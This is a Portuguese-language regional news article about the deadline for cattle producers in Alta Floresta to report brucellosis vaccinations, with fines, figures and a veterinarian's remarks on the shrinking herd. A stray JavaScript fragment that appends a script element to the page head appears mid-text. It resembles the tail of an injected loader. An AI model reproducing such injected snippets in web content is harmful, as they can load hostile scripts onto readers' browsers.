Capa / Cidades / BRUCELOSE: Produtores terão apenas até hoje para comunicação de vacina

BRUCELOSE: Produtores terão apenas até hoje para comunicação de vacina

anselmo-looseDa Redação

O médico veterinário Anselmo Loose, responsável pela Unidade do Indea de Alta Floresta, em entrevista ao Jornal O Diário fez um alerta aos produtores de gado sobre o prazo para comunicação de vacinação contra a brucelose referente ao segundo semestre de 2016. A vacinação de bezerras de 3 a 8 meses, vacinadas até o dia 31 de dezembro, deverá ser comunidade sob pena de gerar bloqueio na ficha do produtor o que impedirá a entrada de novos animais nas propriedades.

Segundo Loose, em torno de 250 propriedades estão sem comunicação de brucelose. “Esse ano nós recebemos uma lista de propriedades que fizeram a vacinação, que estão com atestado pronto, mas ainda não levaram na unidade do Indea para confirmar o código de recebimento”. O número é expressivo, segundo o médico veterinário.

A partir de 4ª feira, dia 11, as propriedades que não comunicaram, serão analisadas através do histórico de movimentação. A multa para quem não comunicar (inclusive por não vacinar) é de UPF por cabeça (cerca de 127 reais) e o bloqueio do produtor para movimentação de saída de animais.

gado_neloreQUEDA NO REBANHO

Segundo Anselmo Loose, Alta Floresta perdeu 36 mil cabeças de gado nos últimos dois anos de atividade pecuária. Atualmente o rebanho é de 707 mil cabeças, de mamando a caducando. Em toda a região, desde Nova Monte Verde até Carlinda, são em torno de 2,8 milhão de cabeças. “Em Alta Floresta nós observamos que de 2014 para 2015 caiu 30 mil cabeças e de 2015 para 2016 mais 6 mil cabeças”.

lavouraNão é possível, segundo Loose apontar o apenas um fator que possa ter contribuído para a queda do rebanho, mas o avanço da agricultura em larga escala pode ter contribuído, assim como a degradação do solo por décadas de atividade. “Mais de duas décadas de exploração intensiva, pastoreio intensivo, tivemos o início da morte súbita, a gente fala em morte súbita mas a agonia é longa pra chegar neste ponto, então o somatório destes fatores, lavoura entrando, necessidade de reforma de pasto, tem comprometido com a queda do nosso rebanho”, analisou.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top